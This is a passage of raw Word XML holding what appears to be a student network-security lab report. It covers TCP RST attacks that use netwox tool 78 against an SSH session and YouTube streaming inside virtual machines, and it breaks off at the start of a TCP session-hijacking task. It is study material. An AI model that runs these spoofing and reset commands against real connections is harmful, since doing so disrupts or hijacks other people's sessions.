        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="6858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55">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5648325" cy="4200525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="4967" t="3501"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5648325" cy="4200525"/>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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we will attempt the same attack on an SSH connection between the Victim and Observer VMs. This time we will be targeting port 22 and sending the RST packets through there instead of directly to the source VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we establish the SSH connection between Victim and Observer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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ssh 10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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5D">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1295400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600"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5F">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60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we execute the attack command on port 22 and with a spoofed IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo netwox 78 --device “Eth0” --filter “port 22” --spoofip “raw” --ips 10.0.2.13</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon observation on WireShark we see that the RST packet is successfully sent and received on port 22 and breaks the SSH connection between Victim and Observer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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59436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rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: TCP RST Attacks on Video Streaming Applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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t xml:space="preserve">First we first test to see if Youtube works on the Client’s machine (10.0.2.4):</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4629150" cy="3390900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="5319"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="462915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t xml:space="preserve">We can see that this youtube video works just fine on the machine.</w:t>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t xml:space="preserve">In order to perform this task, we need to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netwox </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">again, specifically the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset every TCP packet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool (Tool 78). We set the filter to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“src host 10.0.2.4”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> because we want to filter for packets that are initiated by the VM. </w:t>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t xml:space="preserve">We type the following command on the same machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo netwox 78 --filter “src host 10.0.2.4”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2628900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see that the video is not playing, it just keeps trying to load the rest.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4: TCP Session Hijacking</w:t>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t xml:space="preserve">First, we set up 3 Virtual Machines: a Client(10.0.2.4), Server(10.0.2.5) and Attacker(10.0.2.6).  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we telnet to the Server from the Client to establish a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ telnet 10.0.2.5</w:t>
      </w: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t xml:space="preserve">We use wireshark to figure out what values we should put into each field of our spoofed packets. We look at the last packet captured:</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4432300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="443230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t xml:space="preserve">From this we can obtain the following information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--ip4-src 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:rPr>
